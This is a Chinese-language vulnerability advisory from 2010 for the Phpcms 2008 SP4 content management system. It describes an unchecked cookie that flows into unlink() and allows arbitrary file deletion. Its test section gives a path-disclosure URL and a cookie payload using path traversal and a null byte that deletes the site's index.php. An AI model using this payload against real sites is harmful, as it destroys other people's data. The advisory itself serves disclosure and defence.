发布日期：2010-10-09
更新日期：2010-10-09

受影响系统：

酷6网 Phpcms 2008 SP4

描述：

---

Phpcms网站管理系统是国内主流CMS系统之一。

corpandresize/config.inc.php中定义：

$tmp = $_COOKIE['tmp'];

define("TMP_PATH", $tmp);

在corpandresize/process.php中用到TMP_PATH，满足前面的一系列条件后：

76: @unlink(TMP_PATH.'/'.$thumbfile);

由于没有检查$_COOKIE['tmp']就直接放入unlink()中，只要修改cookie就可以删除网站的任意文件。

<*来源：CnCxzSec
  
  链接：http://www.wooyun.org/bug.php?action=view&id=412
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

注册用户登陆后访问
http://localhost/phpcms/corpandresize/process.php?pic=../images/logo.gif

此时泄露绝对路径

在cookie中添加一句（或修改原有值）tmp=../index.php%00即可删除首页文件

建议：

---

厂商补丁：

酷6网
-----
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.phpcms.cn/

浏览次数：3184
严重程度：0（网友投票）